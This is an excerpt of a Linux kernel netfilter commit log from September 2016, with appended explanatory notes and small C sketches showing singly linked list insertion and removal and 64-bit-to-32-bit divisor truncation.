Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:54:01 +02:00
Aaron Conole	e3b37f11e6	netfilter: replace list_head with single linked list The netfilter hook list never uses the prev pointer, and so can be trimmed to be a simple singly-linked list. In addition to having a more light weight structure for hook traversal, struct net becomes 5568 bytes (down from 6400) and struct net_device becomes 2176 bytes (down from 2240). Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-25 14:38:48 +02:00
Aaron Conole	d4bb5caa9c	netfilter: Only allow sane values in nf_register_net_hook This commit adds an upfront check for sane values to be passed when registering a netfilter hook. This will be used in a future patch for a simplified hook list traversal. Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-24 21:30:19 +02:00
Aaron Conole	e2361cb90a	netfilter: Remove explicit rcu_read_lock in nf_hook_slow All of the callers of nf_hook_slow already hold the rcu_read_lock, so this cleanup removes the recursive call. This is just a cleanup, as the locking code gracefully handles this situation. Signed-off-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-24 21:29:53 +02:00
Gao Feng	50f4c7b73f	netfilter: xt_TCPMSS: Refactor the codes to decrease one condition check and more readable The origin codes perform two condition checks with dst_mtu(skb_dst(skb)) and in_mtu. And the last statement is "min(dst_mtu(skb_dst(skb)), in_mtu) - minlen". It may let reader think about how about the result. Would it be negative. Now assign the result of min(dst_mtu(skb_dst(skb)), in_mtu) to a new variable, then only perform one condition check, and it is more readable. Signed-off-by: Gao Feng <fgao@ikuai8.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>	2016-09-24 21:13:21 +02:00
David S. Miller	d6989d4bbe	Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net	2016-09-23 06:46:57 -04:00
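
Note on bd3769bfed ("netfilter: Fix slab corruption."): the message refers to "the correct pattern for singly linked list insertion and deletion" without showing it. One common form of that pattern walks the list with a pointer to the link being examined, so the head and interior nodes need no separate cases. The following is a minimal user-space sketch of that idea only. The struct and function names (hook_entry, hook_insert, hook_remove) are hypothetical, and it is not the code from net/netfilter/core.c; the kernel version additionally deals with locking and RCU.

```c
#include <stddef.h>

/* Hypothetical stand-in for a hook list entry; not the kernel's struct. */
struct hook_entry {
    int priority;
    struct hook_entry *next;
};

/*
 * Insert new_entry so the list stays sorted by ascending priority.
 * pp always points at the link (head or some ->next) that would have
 * to change, so inserting at the head is not a special case.
 */
static void hook_insert(struct hook_entry **head, struct hook_entry *new_entry)
{
    struct hook_entry **pp = head;

    while (*pp && (*pp)->priority <= new_entry->priority)
        pp = &(*pp)->next;

    new_entry->next = *pp;
    *pp = new_entry;
}

/*
 * Unlink victim from the list. Returns 1 if it was found and removed,
 * 0 if the list is empty or does not contain it.
 */
static int hook_remove(struct hook_entry **head, struct hook_entry *victim)
{
    struct hook_entry **pp = head;

    while (*pp) {
        if (*pp == victim) {
            *pp = victim->next;
            victim->next = NULL;
            return 1;
        }
        pp = &(*pp)->next;
    }
    return 0;
}
```

Because hook_remove() checks *pp before dereferencing it, calling it on an empty list or for an entry that was already removed simply returns 0.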

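
Note on 2fa46c1301 ("netfilter: nft_limit: fix divided by zero panic"): the message explains that a 64-bit divisor was treated as a 32-bit integer, so 0xf00000000 became zero. The arithmetic can be reproduced in user space with the sketch below. The helper names (truncate_to_u32, div_u64_checked) are made up for illustration, and the sketch does not reproduce the actual kernel patch, which the log entry does not show.

```c
#include <stdint.h>

/* What happens when a 64-bit value is stored in a 32-bit variable:
 * only the low 32 bits survive. */
static uint32_t truncate_to_u32(uint64_t value)
{
    return (uint32_t)value;
}

/*
 * Divide using the full 64-bit divisor and refuse a zero divisor.
 * Returns 0 and stores the quotient in *quotient on success,
 * or -1 if divisor is zero.
 */
static int div_u64_checked(uint64_t dividend, uint64_t divisor,
                           uint64_t *quotient)
{
    if (divisor == 0)
        return -1;

    *quotient = dividend / divisor;
    return 0;
}
```

0xf00000000 is 15 * 2^32, so its low 32 bits are all zero: truncate_to_u32(0xf00000000ULL) yields 0, which is the zero divisor from the reported panic, while the untruncated value is a perfectly valid divisor.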

3618 commits